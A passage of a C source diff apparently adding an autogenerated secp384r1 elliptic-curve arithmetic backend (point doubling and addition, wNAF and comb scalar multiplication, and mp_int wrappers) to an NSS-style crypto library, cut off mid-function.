UINT32_C(0x2AEC8CBD), ++ UINT32_C(0xB3409F84), UINT32_C(0x19D87DF0), UINT32_C(0x5EBFD436), ++ UINT32_C(0xE8526DE2), UINT32_C(0xCB4C209B), UINT32_C(0x21E1A230), ++ UINT32_C(0xD764085B), UINT32_C(0x0899964A), UINT32_C(0x96F91554) }, ++ { UINT32_C(0xA57D122A), UINT32_C(0xB0BEC8EF), UINT32_C(0x5D9D0B33), ++ UINT32_C(0xC572EC56), UINT32_C(0xCFA7C72C), UINT32_C(0xEBE2A780), ++ UINT32_C(0x9EF3295C), UINT32_C(0x52D40CDB), UINT32_C(0x0DE74DFE), ++ UINT32_C(0x64004584), UINT32_C(0xC0809716), UINT32_C(0xA6846432) } }, ++ { { UINT32_C(0x02C979BC), UINT32_C(0x0D09E8CD), UINT32_C(0x409F4F2A), ++ UINT32_C(0xEC4B21F6), UINT32_C(0x13FB07CA), UINT32_C(0x68125C70), ++ UINT32_C(0x6FDFA72A), UINT32_C(0x1C4CFC17), UINT32_C(0x04539FCD), ++ UINT32_C(0xC9E71B9E), UINT32_C(0x8BA70797), UINT32_C(0x94B7103D) }, ++ { UINT32_C(0xB33FDE83), UINT32_C(0x6B81E82F), UINT32_C(0xEABAFD4B), ++ UINT32_C(0x7CA9A8CA), UINT32_C(0xEAB819CE), UINT32_C(0xADD85A67), ++ UINT32_C(0x98E99FFC), UINT32_C(0xAEC25483), UINT32_C(0x274A07B6), ++ UINT32_C(0x938D6440), UINT32_C(0x564A6AA0), UINT32_C(0x0A5C7097) } }, ++ { { UINT32_C(0x2F4FCEB6), UINT32_C(0x7284FF50), UINT32_C(0x78D0D5CB), ++ UINT32_C(0x0A28715A), UINT32_C(0xBFCE187C), UINT32_C(0xE70B7014), ++ UINT32_C(0x7A17148D), UINT32_C(0xA6B538F5), UINT32_C(0xDD427166), ++ UINT32_C(0x1DAB07C9), UINT32_C(0x149D23CA), UINT32_C(0x5C5578B0) }, ++ { UINT32_C(0x875B5EDE), UINT32_C(0x875E2056), UINT32_C(0x02C893B9), ++ UINT32_C(0xCBF44B6D), UINT32_C(0x5C2993FB), UINT32_C(0x5715A77E), ++ UINT32_C(0x3410597E), UINT32_C(0xAF328146), UINT32_C(0x42DC49DF), ++ UINT32_C(0x65DF418F), UINT32_C(0xA9EE52F6), UINT32_C(0x7AC9C720) } }, ++ { { UINT32_C(0x62955486), UINT32_C(0xB1C9AA07), UINT32_C(0x245061D7), ++ UINT32_C(0xCBF35BE3), UINT32_C(0x8CF4DDC0), UINT32_C(0x811E1BD3), ++ UINT32_C(0x948F7C84), UINT32_C(0xD9D4589C), UINT32_C(0xCB0F996D), ++ UINT32_C(0x30D09A0F), UINT32_C(0x590E7704), UINT32_C(0x1A1B3B7A) }, ++ { UINT32_C(0x2082768D), UINT32_C(0xA848E349), UINT32_C(0x9A249DF4), ++ UINT32_C(0x9FEBD492), UINT32_C(0x5F20439A), UINT32_C(0x503420AF), ++ UINT32_C(0x8E2BFCD4), UINT32_C(0x0CBE52B6), UINT32_C(0x118C91B2), ++ UINT32_C(0xB1D5E261), UINT32_C(0x71D8F2BC), UINT32_C(0x93CFF6DA) } }, ++ { { UINT32_C(0x8AB58944), UINT32_C(0x5F5BC06B), UINT32_C(0x4979882D), ++ UINT32_C(0xE4BED538), UINT32_C(0xD79B0EB1), UINT32_C(0x57C30362), ++ UINT32_C(0xEF7C56D8), UINT32_C(0x391AE2C1), UINT32_C(0xADD98625), ++ UINT32_C(0x28BC2E97), UINT32_C(0x1B257107), UINT32_C(0xFA8E86B8) }, ++ { UINT32_C(0x6118C715), UINT32_C(0x5E4859F8), UINT32_C(0x524C71DD), ++ UINT32_C(0x91C83324), UINT32_C(0x6D2F5E6D), UINT32_C(0xFB209243), ++ UINT32_C(0x2A900A43), UINT32_C(0x6B4FE21F), UINT32_C(0x32A73C1F), ++ UINT32_C(0x241F75D6), UINT32_C(0x5AE89613), UINT32_C(0xF5BC4629) } }, ++ } ++}; ++ ++/*- ++ * Q := 2P, both projective, Q and P same pointers OK ++ * Autogenerated: op3/dbl_proj.op3 ++ * https://eprint.iacr.org/2015/1060 Alg 6 ++ * ASSERT: a = -3 ++ */ ++static void ++point_double(pt_prj_t *Q, const pt_prj_t *P) ++{ ++ /* temporary variables */ ++ fe_t t0, t1, t2, t3, t4; ++ /* constants */ ++ const limb_t *b = const_b; ++ /* set pointers for legacy curve arith */ ++ const limb_t *X = P->X; ++ const limb_t *Y = P->Y; ++ const limb_t *Z = P->Z; ++ limb_t *X3 = Q->X; ++ limb_t *Y3 = Q->Y; ++ limb_t *Z3 = Q->Z; ++ ++ /* the curve arith formula */ ++ fiat_secp384r1_square(t0, X); ++ fiat_secp384r1_square(t1, Y); ++ fiat_secp384r1_square(t2, Z); ++ fiat_secp384r1_mul(t3, X, Y); ++ fiat_secp384r1_add(t3, t3, t3); ++ fiat_secp384r1_mul(t4, Y, Z); ++ fiat_secp384r1_mul(Z3, X, Z); ++ fiat_secp384r1_add(Z3, Z3, Z3); ++ fiat_secp384r1_mul(Y3, b, t2); ++ fiat_secp384r1_sub(Y3, Y3, Z3); ++ fiat_secp384r1_add(X3, Y3, Y3); ++ fiat_secp384r1_add(Y3, X3, Y3); ++ fiat_secp384r1_sub(X3, t1, Y3); ++ fiat_secp384r1_add(Y3, t1, Y3); ++ fiat_secp384r1_mul(Y3, X3, Y3); ++ fiat_secp384r1_mul(X3, X3, t3); ++ fiat_secp384r1_add(t3, t2, t2); ++ fiat_secp384r1_add(t2, t2, t3); ++ fiat_secp384r1_mul(Z3, b, Z3); ++ fiat_secp384r1_sub(Z3, Z3, t2); ++ fiat_secp384r1_sub(Z3, Z3, t0); ++ fiat_secp384r1_add(t3, Z3, Z3); ++ fiat_secp384r1_add(Z3, Z3, t3); ++ fiat_secp384r1_add(t3, t0, t0); ++ fiat_secp384r1_add(t0, t3, t0); ++ fiat_secp384r1_sub(t0, t0, t2); ++ fiat_secp384r1_mul(t0, t0, Z3); ++ fiat_secp384r1_add(Y3, Y3, t0); ++ fiat_secp384r1_add(t0, t4, t4); ++ fiat_secp384r1_mul(Z3, t0, Z3); ++ fiat_secp384r1_sub(X3, X3, Z3); ++ fiat_secp384r1_mul(Z3, t0, t1); ++ fiat_secp384r1_add(Z3, Z3, Z3); ++ fiat_secp384r1_add(Z3, Z3, Z3); ++} ++ ++/*- ++ * R := Q + P where R and Q are projective, P affine. ++ * R and Q same pointers OK ++ * R and P same pointers not OK ++ * Autogenerated: op3/add_mixed.op3 ++ * https://eprint.iacr.org/2015/1060 Alg 5 ++ * ASSERT: a = -3 ++ */ ++static void ++point_add_mixed(pt_prj_t *R, const pt_prj_t *Q, const pt_aff_t *P) ++{ ++ /* temporary variables */ ++ fe_t t0, t1, t2, t3, t4; ++ /* constants */ ++ const limb_t *b = const_b; ++ /* set pointers for legacy curve arith */ ++ const limb_t *X1 = Q->X; ++ const limb_t *Y1 = Q->Y; ++ const limb_t *Z1 = Q->Z; ++ const limb_t *X2 = P->X; ++ const limb_t *Y2 = P->Y; ++ fe_t X3; ++ fe_t Y3; ++ fe_t Z3; ++ limb_t nz; ++ ++ /* check P for affine inf */ ++ fiat_secp384r1_nonzero(&nz, P->Y); ++ ++ /* the curve arith formula */ ++ fiat_secp384r1_mul(t0, X1, X2); ++ fiat_secp384r1_mul(t1, Y1, Y2); ++ fiat_secp384r1_add(t3, X2, Y2); ++ fiat_secp384r1_add(t4, X1, Y1); ++ fiat_secp384r1_mul(t3, t3, t4); ++ fiat_secp384r1_add(t4, t0, t1); ++ fiat_secp384r1_sub(t3, t3, t4); ++ fiat_secp384r1_mul(t4, Y2, Z1); ++ fiat_secp384r1_add(t4, t4, Y1); ++ fiat_secp384r1_mul(Y3, X2, Z1); ++ fiat_secp384r1_add(Y3, Y3, X1); ++ fiat_secp384r1_mul(Z3, b, Z1); ++ fiat_secp384r1_sub(X3, Y3, Z3); ++ fiat_secp384r1_add(Z3, X3, X3); ++ fiat_secp384r1_add(X3, X3, Z3); ++ fiat_secp384r1_sub(Z3, t1, X3); ++ fiat_secp384r1_add(X3, t1, X3); ++ fiat_secp384r1_mul(Y3, b, Y3); ++ fiat_secp384r1_add(t1, Z1, Z1); ++ fiat_secp384r1_add(t2, t1, Z1); ++ fiat_secp384r1_sub(Y3, Y3, t2); ++ fiat_secp384r1_sub(Y3, Y3, t0); ++ fiat_secp384r1_add(t1, Y3, Y3); ++ fiat_secp384r1_add(Y3, t1, Y3); ++ fiat_secp384r1_add(t1, t0, t0); ++ fiat_secp384r1_add(t0, t1, t0); ++ fiat_secp384r1_sub(t0, t0, t2); ++ fiat_secp384r1_mul(t1, t4, Y3); ++ fiat_secp384r1_mul(t2, t0, Y3); ++ fiat_secp384r1_mul(Y3, X3, Z3); ++ fiat_secp384r1_add(Y3, Y3, t2); ++ fiat_secp384r1_mul(X3, t3, X3); ++ fiat_secp384r1_sub(X3, X3, t1); ++ fiat_secp384r1_mul(Z3, t4, Z3); ++ fiat_secp384r1_mul(t1, t3, t0); ++ fiat_secp384r1_add(Z3, Z3, t1); ++ ++ /* if P is inf, throw all that away and take Q */ ++ fiat_secp384r1_selectznz(R->X, nz, Q->X, X3); ++ fiat_secp384r1_selectznz(R->Y, nz, Q->Y, Y3); ++ fiat_secp384r1_selectznz(R->Z, nz, Q->Z, Z3); ++} ++ ++/*- ++ * R := Q + P all projective. ++ * R and Q same pointers OK ++ * R and P same pointers not OK ++ * Autogenerated: op3/add_proj.op3 ++ * https://eprint.iacr.org/2015/1060 Alg 4 ++ * ASSERT: a = -3 ++ */ ++static void ++point_add_proj(pt_prj_t *R, const pt_prj_t *Q, const pt_prj_t *P) ++{ ++ /* temporary variables */ ++ fe_t t0, t1, t2, t3, t4, t5; ++ /* constants */ ++ const limb_t *b = const_b; ++ /* set pointers for legacy curve arith */ ++ const limb_t *X1 = Q->X; ++ const limb_t *Y1 = Q->Y; ++ const limb_t *Z1 = Q->Z; ++ const limb_t *X2 = P->X; ++ const limb_t *Y2 = P->Y; ++ const limb_t *Z2 = P->Z; ++ limb_t *X3 = R->X; ++ limb_t *Y3 = R->Y; ++ limb_t *Z3 = R->Z; ++ ++ /* the curve arith formula */ ++ fiat_secp384r1_mul(t0, X1, X2); ++ fiat_secp384r1_mul(t1, Y1, Y2); ++ fiat_secp384r1_mul(t2, Z1, Z2); ++ fiat_secp384r1_add(t3, X1, Y1); ++ fiat_secp384r1_add(t4, X2, Y2); ++ fiat_secp384r1_mul(t3, t3, t4); ++ fiat_secp384r1_add(t4, t0, t1); ++ fiat_secp384r1_sub(t3, t3, t4); ++ fiat_secp384r1_add(t4, Y1, Z1); ++ fiat_secp384r1_add(t5, Y2, Z2); ++ fiat_secp384r1_mul(t4, t4, t5); ++ fiat_secp384r1_add(t5, t1, t2); ++ fiat_secp384r1_sub(t4, t4, t5); ++ fiat_secp384r1_add(X3, X1, Z1); ++ fiat_secp384r1_add(Y3, X2, Z2); ++ fiat_secp384r1_mul(X3, X3, Y3); ++ fiat_secp384r1_add(Y3, t0, t2); ++ fiat_secp384r1_sub(Y3, X3, Y3); ++ fiat_secp384r1_mul(Z3, b, t2); ++ fiat_secp384r1_sub(X3, Y3, Z3); ++ fiat_secp384r1_add(Z3, X3, X3); ++ fiat_secp384r1_add(X3, X3, Z3); ++ fiat_secp384r1_sub(Z3, t1, X3); ++ fiat_secp384r1_add(X3, t1, X3); ++ fiat_secp384r1_mul(Y3, b, Y3); ++ fiat_secp384r1_add(t1, t2, t2); ++ fiat_secp384r1_add(t2, t1, t2); ++ fiat_secp384r1_sub(Y3, Y3, t2); ++ fiat_secp384r1_sub(Y3, Y3, t0); ++ fiat_secp384r1_add(t1, Y3, Y3); ++ fiat_secp384r1_add(Y3, t1, Y3); ++ fiat_secp384r1_add(t1, t0, t0); ++ fiat_secp384r1_add(t0, t1, t0); ++ fiat_secp384r1_sub(t0, t0, t2); ++ fiat_secp384r1_mul(t1, t4, Y3); ++ fiat_secp384r1_mul(t2, t0, Y3); ++ fiat_secp384r1_mul(Y3, X3, Z3); ++ fiat_secp384r1_add(Y3, Y3, t2); ++ fiat_secp384r1_mul(X3, t3, X3); ++ fiat_secp384r1_sub(X3, X3, t1); ++ fiat_secp384r1_mul(Z3, t4, Z3); ++ fiat_secp384r1_mul(t1, t3, t0); ++ fiat_secp384r1_add(Z3, Z3, t1); ++} ++ ++/* constants */ ++#define RADIX 5 ++#define DRADIX (1 << RADIX) ++#define DRADIX_WNAF ((DRADIX) << 1) ++ ++/*- ++ * precomp for wnaf scalar multiplication: ++ * precomp[0] = 1P ++ * precomp[1] = 3P ++ * precomp[2] = 5P ++ * precomp[3] = 7P ++ * precomp[4] = 9P ++ * ... ++ */ ++static void ++precomp_wnaf(pt_prj_t precomp[DRADIX / 2], const pt_aff_t *P) ++{ ++ int i; ++ ++ fe_copy(precomp[0].X, P->X); ++ fe_copy(precomp[0].Y, P->Y); ++ fe_copy(precomp[0].Z, const_one); ++ point_double(&precomp[DRADIX / 2 - 1], &precomp[0]); ++ ++ for (i = 1; i < DRADIX / 2; i++) ++ point_add_proj(&precomp[i], &precomp[DRADIX / 2 - 1], &precomp[i - 1]); ++} ++ ++/* fetch a scalar bit */ ++static int ++scalar_get_bit(const unsigned char in[48], int idx) ++{ ++ int widx, rshift; ++ ++ widx = idx >> 3; ++ rshift = idx & 0x7; ++ ++ if (idx < 0 || widx >= 48) ++ return 0; ++ ++ return (in[widx] >> rshift) & 0x1; ++} ++ ++/*- ++ * Compute "regular" wnaf representation of a scalar. ++ * See "Exponent Recoding and Regular Exponentiation Algorithms", ++ * Tunstall et al., AfricaCrypt 2009, Alg 6. ++ * It forces an odd scalar and outputs digits in ++ * {\pm 1, \pm 3, \pm 5, \pm 7, \pm 9, ...} ++ * i.e. signed odd digits with _no zeroes_ -- that makes it "regular". ++ */ ++static void ++scalar_rwnaf(int8_t out[77], const unsigned char in[48]) ++{ ++ int i; ++ int8_t window, d; ++ ++ window = (in[0] & (DRADIX_WNAF - 1)) | 1; ++ for (i = 0; i < 76; i++) { ++ d = (window & (DRADIX_WNAF - 1)) - DRADIX; ++ out[i] = d; ++ window = (window - d) >> RADIX; ++ window += scalar_get_bit(in, (i + 1) * RADIX + 1) << 1; ++ window += scalar_get_bit(in, (i + 1) * RADIX + 2) << 2; ++ window += scalar_get_bit(in, (i + 1) * RADIX + 3) << 3; ++ window += scalar_get_bit(in, (i + 1) * RADIX + 4) << 4; ++ window += scalar_get_bit(in, (i + 1) * RADIX + 5) << 5; ++ } ++ out[i] = window; ++} ++ ++/*- ++ * Compute "textbook" wnaf representation of a scalar. ++ * NB: not constant time ++ */ ++static void ++scalar_wnaf(int8_t out[385], const unsigned char in[48]) ++{ ++ int i; ++ int8_t window, d; ++ ++ window = in[0] & (DRADIX_WNAF - 1); ++ for (i = 0; i < 385; i++) { ++ d = 0; ++ if ((window & 1) && ((d = window & (DRADIX_WNAF - 1)) & DRADIX)) ++ d -= DRADIX_WNAF; ++ out[i] = d; ++ window = (window - d) >> 1; ++ window += scalar_get_bit(in, i + 1 + RADIX) << RADIX; ++ } ++} ++ ++/*- ++ * Simulateous scalar multiplication: interleaved "textbook" wnaf. ++ * NB: not constant time ++ */ ++static void ++var_smul_wnaf_two(pt_aff_t *out, const unsigned char a[48], ++ const unsigned char b[48], const pt_aff_t *P) ++{ ++ int i, d, is_neg, is_inf = 1, flipped = 0; ++ int8_t anaf[385] = { 0 }; ++ int8_t bnaf[385] = { 0 }; ++ pt_prj_t Q; ++ pt_prj_t precomp[DRADIX / 2]; ++ ++ precomp_wnaf(precomp, P); ++ scalar_wnaf(anaf, a); ++ scalar_wnaf(bnaf, b); ++ ++ for (i = 384; i >= 0; i--) { ++ if (!is_inf) ++ point_double(&Q, &Q); ++ if ((d = bnaf[i])) { ++ if ((is_neg = d < 0) != flipped) { ++ fiat_secp384r1_opp(Q.Y, Q.Y); ++ flipped ^= 1; ++ } ++ d = (is_neg) ? (-d - 1) >> 1 : (d - 1) >> 1; ++ if (is_inf) { ++ /* initialize accumulator */ ++ fe_copy(Q.X, &precomp[d].X); ++ fe_copy(Q.Y, &precomp[d].Y); ++ fe_copy(Q.Z, &precomp[d].Z); ++ is_inf = 0; ++ } else ++ point_add_proj(&Q, &Q, &precomp[d]); ++ } ++ if ((d = anaf[i])) { ++ if ((is_neg = d < 0) != flipped) { ++ fiat_secp384r1_opp(Q.Y, Q.Y); ++ flipped ^= 1; ++ } ++ d = (is_neg) ? (-d - 1) >> 1 : (d - 1) >> 1; ++ if (is_inf) { ++ /* initialize accumulator */ ++ fe_copy(Q.X, &lut_cmb[0][d].X); ++ fe_copy(Q.Y, &lut_cmb[0][d].Y); ++ fe_copy(Q.Z, const_one); ++ is_inf = 0; ++ } else ++ point_add_mixed(&Q, &Q, &lut_cmb[0][d]); ++ } ++ } ++ ++ if (is_inf) { ++ /* initialize accumulator to inf: all-zero scalars */ ++ fe_set_zero(Q.X); ++ fe_copy(Q.Y, const_one); ++ fe_set_zero(Q.Z); ++ } ++ ++ if (flipped) { ++ /* correct sign */ ++ fiat_secp384r1_opp(Q.Y, Q.Y); ++ } ++ ++ /* convert to affine -- NB depends on coordinate system */ ++ fiat_secp384r1_inv(Q.Z, Q.Z); ++ fiat_secp384r1_mul(out->X, Q.X, Q.Z); ++ fiat_secp384r1_mul(out->Y, Q.Y, Q.Z); ++} ++ ++/*- ++ * Variable point scalar multiplication with "regular" wnaf. ++ */ ++static void ++var_smul_rwnaf(pt_aff_t *out, const unsigned char scalar[48], ++ const pt_aff_t *P) ++{ ++ int i, j, d, diff, is_neg; ++ int8_t rnaf[77] = { 0 }; ++ pt_prj_t Q, lut; ++ pt_prj_t precomp[DRADIX / 2]; ++ ++ precomp_wnaf(precomp, P); ++ scalar_rwnaf(rnaf, scalar); ++ ++#if defined(_MSC_VER) ++/* result still unsigned: yes we know */ ++#pragma warning(push) ++#pragma warning(disable : 4146) ++#endif ++ ++ /* initialize accumulator to high digit */ ++ d = (rnaf[76] - 1) >> 1; ++ for (j = 0; j < DRADIX / 2; j++) { ++ diff = (1 - (-(d ^ j) >> (8 * sizeof(int) - 1))) & 1; ++ fiat_secp384r1_selectznz(Q.X, diff, Q.X, precomp[j].X); ++ fiat_secp384r1_selectznz(Q.Y, diff, Q.Y, precomp[j].Y); ++ fiat_secp384r1_selectznz(Q.Z, diff, Q.Z, precomp[j].Z); ++ } ++ ++ for (i = 75; i >= 0; i--) { ++ for (j = 0; j < RADIX; j++) ++ point_double(&Q, &Q); ++ d = rnaf[i]; ++ /* is_neg = (d < 0) ? 1 : 0 */ ++ is_neg = (d >> (8 * sizeof(int) - 1)) & 1; ++ /* d = abs(d) */ ++ d = (d ^ -is_neg) + is_neg; ++ d = (d - 1) >> 1; ++ for (j = 0; j < DRADIX / 2; j++) { ++ diff = (1 - (-(d ^ j) >> (8 * sizeof(int) - 1))) & 1; ++ fiat_secp384r1_selectznz(lut.X, diff, lut.X, precomp[j].X); ++ fiat_secp384r1_selectznz(lut.Y, diff, lut.Y, precomp[j].Y); ++ fiat_secp384r1_selectznz(lut.Z, diff, lut.Z, precomp[j].Z); ++ } ++ /* negate lut point if digit is negative */ ++ fiat_secp384r1_opp(out->Y, lut.Y); ++ fiat_secp384r1_selectznz(lut.Y, is_neg, lut.Y, out->Y); ++ point_add_proj(&Q, &Q, &lut); ++ } ++ ++#if defined(_MSC_VER) ++#pragma warning(pop) ++#endif ++ ++ /* conditionally subtract P if the scalar was even */ ++ fe_copy(lut.X, precomp[0].X); ++ fiat_secp384r1_opp(lut.Y, precomp[0].Y); ++ fe_copy(lut.Z, precomp[0].Z); ++ point_add_proj(&lut, &lut, &Q); ++ fiat_secp384r1_selectznz(Q.X, scalar[0] & 1, lut.X, Q.X); ++ fiat_secp384r1_selectznz(Q.Y, scalar[0] & 1, lut.Y, Q.Y); ++ fiat_secp384r1_selectznz(Q.Z, scalar[0] & 1, lut.Z, Q.Z); ++ ++ /* convert to affine -- NB depends on coordinate system */ ++ fiat_secp384r1_inv(Q.Z, Q.Z); ++ fiat_secp384r1_mul(out->X, Q.X, Q.Z); ++ fiat_secp384r1_mul(out->Y, Q.Y, Q.Z); ++} ++ ++/*- ++ * Fixed scalar multiplication: comb with interleaving. ++ */ ++static void ++fixed_smul_cmb(pt_aff_t *out, const unsigned char scalar[48]) ++{ ++ int i, j, k, d, diff, is_neg = 0; ++ int8_t rnaf[77] = { 0 }; ++ pt_prj_t Q, R; ++ pt_aff_t lut; ++ ++ scalar_rwnaf(rnaf, scalar); ++ ++ /* initalize accumulator to inf */ ++ fe_set_zero(Q.X); ++ fe_copy(Q.Y, const_one); ++ fe_set_zero(Q.Z); ++ ++#if defined(_MSC_VER) ++/* result still unsigned: yes we know */ ++#pragma warning(push) ++#pragma warning(disable : 4146) ++#endif ++ ++ for (i = 3; i >= 0; i--) { ++ for (j = 0; i != 3 && j < RADIX; j++) ++ point_double(&Q, &Q); ++ for (j = 0; j < 21; j++) { ++ if (j * 4 + i > 76) ++ continue; ++ d = rnaf[j * 4 + i]; ++ /* is_neg = (d < 0) ? 1 : 0 */ ++ is_neg = (d >> (8 * sizeof(int) - 1)) & 1; ++ /* d = abs(d) */ ++ d = (d ^ -is_neg) + is_neg; ++ d = (d - 1) >> 1; ++ for (k = 0; k < DRADIX / 2; k++) { ++ diff = (1 - (-(d ^ k) >> (8 * sizeof(int) - 1))) & 1; ++ fiat_secp384r1_selectznz(lut.X, diff, lut.X, lut_cmb[j][k].X); ++ fiat_secp384r1_selectznz(lut.Y, diff, lut.Y, lut_cmb[j][k].Y); ++ } ++ /* negate lut point if digit is negative */ ++ fiat_secp384r1_opp(out->Y, lut.Y); ++ fiat_secp384r1_selectznz(lut.Y, is_neg, lut.Y, out->Y); ++ point_add_mixed(&Q, &Q, &lut); ++ } ++ } ++ ++#if defined(_MSC_VER) ++#pragma warning(pop) ++#endif ++ ++ /* conditionally subtract P if the scalar was even */ ++ fe_copy(lut.X, lut_cmb[0][0].X); ++ fiat_secp384r1_opp(lut.Y, lut_cmb[0][0].Y); ++ point_add_mixed(&R, &Q, &lut); ++ fiat_secp384r1_selectznz(Q.X, scalar[0] & 1, R.X, Q.X); ++ fiat_secp384r1_selectznz(Q.Y, scalar[0] & 1, R.Y, Q.Y); ++ fiat_secp384r1_selectznz(Q.Z, scalar[0] & 1, R.Z, Q.Z); ++ ++ /* convert to affine -- NB depends on coordinate system */ ++ fiat_secp384r1_inv(Q.Z, Q.Z); ++ fiat_secp384r1_mul(out->X, Q.X, Q.Z); ++ fiat_secp384r1_mul(out->Y, Q.Y, Q.Z); ++} ++ ++static void ++point_mul_two(unsigned char outx[48], unsigned char outy[48], ++ const unsigned char a[48], const unsigned char b[48], ++ const unsigned char inx[48], ++ const unsigned char iny[48]) ++{ ++ pt_aff_t P; ++ ++ fiat_secp384r1_from_bytes(P.X, inx); ++ fiat_secp384r1_from_bytes(P.Y, iny); ++ fiat_secp384r1_to_montgomery(P.X, P.X); ++ fiat_secp384r1_to_montgomery(P.Y, P.Y); ++ /* simultaneous scalar multiplication */ ++ var_smul_wnaf_two(&P, a, b, &P); ++ ++ fiat_secp384r1_from_montgomery(P.X, P.X); ++ fiat_secp384r1_from_montgomery(P.Y, P.Y); ++ fiat_secp384r1_to_bytes(outx, P.X); ++ fiat_secp384r1_to_bytes(outy, P.Y); ++} ++ ++static void ++point_mul_g(unsigned char outx[48], unsigned char outy[48], ++ const unsigned char scalar[48]) ++{ ++ pt_aff_t P; ++ ++ /* fixed scmul function */ ++ fixed_smul_cmb(&P, scalar); ++ fiat_secp384r1_from_montgomery(P.X, P.X); ++ fiat_secp384r1_from_montgomery(P.Y, P.Y); ++ fiat_secp384r1_to_bytes(outx, P.X); ++ fiat_secp384r1_to_bytes(outy, P.Y); ++} ++ ++static void ++point_mul(unsigned char outx[48], unsigned char outy[48], ++ const unsigned char scalar[48], ++ const unsigned char inx[48], ++ const unsigned char iny[48]) ++{ ++ pt_aff_t P; ++ ++ fiat_secp384r1_from_bytes(P.X, inx); ++ fiat_secp384r1_from_bytes(P.Y, iny); ++ fiat_secp384r1_to_montgomery(P.X, P.X); ++ fiat_secp384r1_to_montgomery(P.Y, P.Y); ++ /* var scmul function */ ++ var_smul_rwnaf(&P, scalar, &P); ++ fiat_secp384r1_from_montgomery(P.X, P.X); ++ fiat_secp384r1_from_montgomery(P.Y, P.Y); ++ fiat_secp384r1_to_bytes(outx, P.X); ++ fiat_secp384r1_to_bytes(outy, P.Y); ++} ++ ++#undef RADIX ++#include "ecp.h" ++#include "mplogic.h" ++ ++/*- ++ * reverse bytes -- total hack ++ */ ++#define MP_BE2LE(a) \ ++ do { \ ++ unsigned char z_bswap; \ ++ z_bswap = a[0]; \ ++ a[0] = a[47]; \ ++ a[47] = z_bswap; \ ++ z_bswap = a[1]; \ ++ a[1] = a[46]; \ ++ a[46] = z_bswap; \ ++ z_bswap = a[2]; \ ++ a[2] = a[45]; \ ++ a[45] = z_bswap; \ ++ z_bswap = a[3]; \ ++ a[3] = a[44]; \ ++ a[44] = z_bswap; \ ++ z_bswap = a[4]; \ ++ a[4] = a[43]; \ ++ a[43] = z_bswap; \ ++ z_bswap = a[5]; \ ++ a[5] = a[42]; \ ++ a[42] = z_bswap; \ ++ z_bswap = a[6]; \ ++ a[6] = a[41]; \ ++ a[41] = z_bswap; \ ++ z_bswap = a[7]; \ ++ a[7] = a[40]; \ ++ a[40] = z_bswap; \ ++ z_bswap = a[8]; \ ++ a[8] = a[39]; \ ++ a[39] = z_bswap; \ ++ z_bswap = a[9]; \ ++ a[9] = a[38]; \ ++ a[38] = z_bswap; \ ++ z_bswap = a[10]; \ ++ a[10] = a[37]; \ ++ a[37] = z_bswap; \ ++ z_bswap = a[11]; \ ++ a[11] = a[36]; \ ++ a[36] = z_bswap; \ ++ z_bswap = a[12]; \ ++ a[12] = a[35]; \ ++ a[35] = z_bswap; \ ++ z_bswap = a[13]; \ ++ a[13] = a[34]; \ ++ a[34] = z_bswap; \ ++ z_bswap = a[14]; \ ++ a[14] = a[33]; \ ++ a[33] = z_bswap; \ ++ z_bswap = a[15]; \ ++ a[15] = a[32]; \ ++ a[32] = z_bswap; \ ++ z_bswap = a[16]; \ ++ a[16] = a[31]; \ ++ a[31] = z_bswap; \ ++ z_bswap = a[17]; \ ++ a[17] = a[30]; \ ++ a[30] = z_bswap; \ ++ z_bswap = a[18]; \ ++ a[18] = a[29]; \ ++ a[29] = z_bswap; \ ++ z_bswap = a[19]; \ ++ a[19] = a[28]; \ ++ a[28] = z_bswap; \ ++ z_bswap = a[20]; \ ++ a[20] = a[27]; \ ++ a[27] = z_bswap; \ ++ z_bswap = a[21]; \ ++ a[21] = a[26]; \ ++ a[26] = z_bswap; \ ++ z_bswap = a[22]; \ ++ a[22] = a[25]; \ ++ a[25] = z_bswap; \ ++ z_bswap = a[23]; \ ++ a[23] = a[24]; \ ++ a[24] = z_bswap; \ ++ } while (0) ++ ++static mp_err ++point_mul_g_secp384r1(const mp_int *n, mp_int *out_x, ++ mp_int *out_y, const ECGroup *group) ++{ ++ unsigned char b_x[48]; ++ unsigned char b_y[48]; ++ unsigned char b_n[48]; ++ mp_err res; ++ ++ ARGCHK(n != NULL && out_x != NULL && out_y != NULL, MP_BADARG); ++ ++ /* fail on out of range scalars */ ++ if (mpl_significant_bits(n) > 384 || mp_cmp_z(n) != 1) ++ return MP_RANGE; ++ ++ MP_CHECKOK(mp_to_fixlen_octets(n, b_n, 48)); ++ MP_BE2LE(b_n); ++ point_mul_g(b_x, b_y, b_n); ++ MP_BE2LE(b_x); ++ MP_BE2LE(b_y); ++ MP_CHECKOK(mp_read_unsigned_octets(out_x, b_x, 48)); ++ MP_CHECKOK(mp_read_unsigned_octets(out_y, b_y, 48)); ++ ++CLEANUP: ++ return res; ++} ++ ++static mp_err ++point_mul_secp384r1(const mp_int *n, const mp_int *in_x, ++ const mp_int *in_y, mp_int *out_x, ++ mp_int *out_y, const ECGroup *group) ++{ ++ unsigned char b_x[48]; ++ unsigned char b_y[48]; ++ unsigned char b_n[48]; ++ mp_err res; ++ ++ ARGCHK(n != NULL && in_x != NULL && in_y != NULL && out_x != NULL && ++ out_y != NULL, ++ MP_BADARG); ++ ++ /* fail on out of range scalars */ ++ if (mpl_significant_bits(n) > 384 || mp_cmp_z(n) != 1) ++ return MP_RANGE; ++ ++ MP_CHECKOK(mp_to_fixlen_octets(n, b_n, 48)); ++ MP_CHECKOK(mp_to_fixlen_octets(in_x, b_x, 48)); ++ MP_CHECKOK(mp_to_fixlen_octets(in_y, b_y, 48)); ++ MP_BE2LE(b_x); ++ MP_BE2LE(b_y); ++ MP_BE2LE(b_n); ++ point_mul(b_x, b_y, b_n, b_x, b_y); ++ MP_BE2LE(b_x); ++ MP_BE2LE(b_y); ++ MP_CHECKOK(mp_read_unsigned_octets(out_x, b_x, 48)); ++ MP_CHECKOK(mp_read_unsigned_octets(out_y, b_y, 48)); ++ ++CLEANUP: ++ return res; ++} ++ ++static mp_err ++point_mul_two_secp384r1(const mp_int *n1, const mp_int *n2, ++ const mp_int *in_x, const mp_int *in_y, ++ mp_int *out_x, mp_int *out_y, ++ const ECGroup *group) ++{ ++ unsigned char b_x[48]; ++ unsigned char b_y[48]; ++ unsigned char b_n1[48]; ++ unsigned char b_n2[48]; ++ mp_err res; ++ ++ /* If n2 == NULL, this is just a base-point multiplication. */ ++ if (n2 == NULL) ++ return point_mul_g_secp384r1(n1, out_x, out_y, group); ++ ++ /* If n1 == NULL, this is just an arbitary-point multiplication. */ ++ if (n1 == NULL) ++ return point_mul_secp384r1(n2, in_x, in_y, out_x, out_y, group); 